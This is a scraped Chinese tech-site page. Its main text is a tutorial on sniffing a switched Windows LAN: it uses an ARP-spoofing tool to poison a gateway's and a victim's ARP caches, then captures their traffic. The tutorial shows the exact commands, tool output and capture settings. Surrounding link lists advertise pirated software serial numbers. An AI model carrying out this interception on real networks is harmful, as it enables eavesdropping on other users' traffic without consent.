- 1PS提示:因為圖層已鎖定,無法編輯圖層的處理方法
- 2picacg蘋果版怎么找不到|picacg ios版是不是下架了介紹
- 3Adobe Illustrator CS5 序列號大全
- 4ACDsee注冊碼免費分享(含ACDsee18、ACDsee10等版本)
- 5Potato(土豆聊天)怎么換頭像|Potato app更改頭像方法介紹
- 6PDF瀏覽器能看3D文件嗎?PDF瀏覽器看3D文件圖文詳細教程
- 7Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 8最新的Adobe Illustrator CS4序列號大全
- 9Intel i7-9700K性能跑分曝光:同代提升約12%
- 10XP系統怎么清除緩存?
- 11Intel Z390主板有望10月8日公布:8核9代酷睿隨后登場
- 12XP系統安裝chrome無法找到入口怎么處理?
[摘要]根據交換環境中Sniffer實現的原理(詳見交換環境下Sniffer的實現), 我寫了一個類似于Linux環境下的ArpSpoof實現在Windows環境下的Arp Sniffer。 在交換環...
根據交換環境中Sniffer實現的原理(詳見交換環境下Sniffer的實現), 我寫了一個類似于Linux環境下的ArpSpoof實現在Windows環境下的Arp Sniffer。
在交換環境下Windows中實現Sniffer需要具備的條件:
1、安裝Winpcap驅動。
2、我寫了一個類似于Linux環境下的ArpSpoof(我只在Windows 2000 Server下測試過, 其他期待您的測試)。
3、一個Sniffer, 如NetXray或者NAI Sniffer Pro(推薦)。
具體的實現方法:
使用ArpSpoof實現基于ARP的欺騙:
C:\>arpspoof.exe
ARPSpoof, by netXeyes, Special Thanks BB
www.netXeyes.com 2002, [email protected]
Usage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
其中Spoof IP1和Spoof IP2是想要進行欺騙和嗅探的IP地址, Own IP是自己的IP地址(注意這三個IP必須是在同一個局域網內沒有跨越交換機或者路由器)。
例如目前公司的局域網環境為192.168.0.xxx, 子網掩碼為255.255.255.0, 網關為192.168.0.1。 我們的IP為192.168.0.29, 想要Sniffer 192.168.0.2的數據包。
由于網關為192.168.0.1, 所以我們就只要欺騙192.168.0.1和192.168.0.2就可以了。 也就是說告訴192.168.0.1, 192.168.0.2的MAC地址是自己(192.168.0.29);然后再告訴192.168.0.2, 192.168.0.1的MAC地址是自己(192.168.0.29)。 這樣以來所有的數據包都會發到192.168.0.29, 并且由192.168.0.29實現轉發(windows 2000默認可以進行包轉發, 至于Windows 9.x和Windows NT/XP我沒有測試過, 希望您可以告訴我)。
C:\>arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29
ARPSpoof, by netXeyes, Special Thanks BB
www.netXeyes.com 2002, [email protected]
Begin Spoof.........
Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
.....................................................
是時候對192.168.0.1和192.168.0.2的ARP欺騙就開始了, 在192.168.0.1上面使用arp -a命令可以看到192.168.0.2和192.168.0.29的MAC地址是一樣的。
C:\>arp -a
Interface: 192.168.0.1 on Interface 0x1000004
Internet Address Physical Address Type
192.168.0.2 00-00-86-61-6b-4e dynamic
192.168.0.29 00-00-86-61-6b-4e dynamic
同樣在192.168.0.2上面也會發現192.168.0.1和192.168.0.29的MAC地址是一樣的。
這樣我們就在192.168.0.1和192.168.0.2之間實現了ARP欺騙。
啟動Sniffer Pro, 在Define Filter里面的Address Type中選擇Hardware(注意不要選為通常的類型IP, 否則抓不到什么有意義的東西), Station1和Station2選擇設置為Any即可。
這時候就開始Sniffer了。
以上結果在我局域網環境中測試通過, 不保證適用于所有的環境。
在開發及測試的過程中得到了BB的大力協助, 以至于耽誤了其看八卦新聞的時間, 內疚了很久......:-)
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。
推薦資訊 總人氣榜
最新教程 本月人氣
- 1Intel 10nm難產服務器也擠牙膏:下代依然28核心
- 2Intel傲騰首次殺入外置硬盤:高玩尤物
- 3硬罡AMD銳龍!Intel主流8核心產品亮相臺北電腦展?
- 4取代酷睿!Intel新CPU微架構Ocean Cove曝光:劍指2020
- 5Intel公布2018 Q1財報:利潤大漲50%、CPU保持增長
- 6顯卡瘋狂漲價買不到:AMD 3A套裝送“福利”
- 7AMD清庫存出奇招!Intel/NVIDIA望塵莫及
- 8Intel官方偷跑8核心8代酷睿CPU:配合Z390送大禮?
- 9電腦高手為什么不買Intel i7?很容易
- 10x86 40周年紀念!Intel i7-8086K怒飆5GHz
- 115.88GHz!AMD Ryzen二代真能超:差一些破紀錄
- 127nm Navi被曝僅GTX 1070級別:A卡新旗艦跳票2020
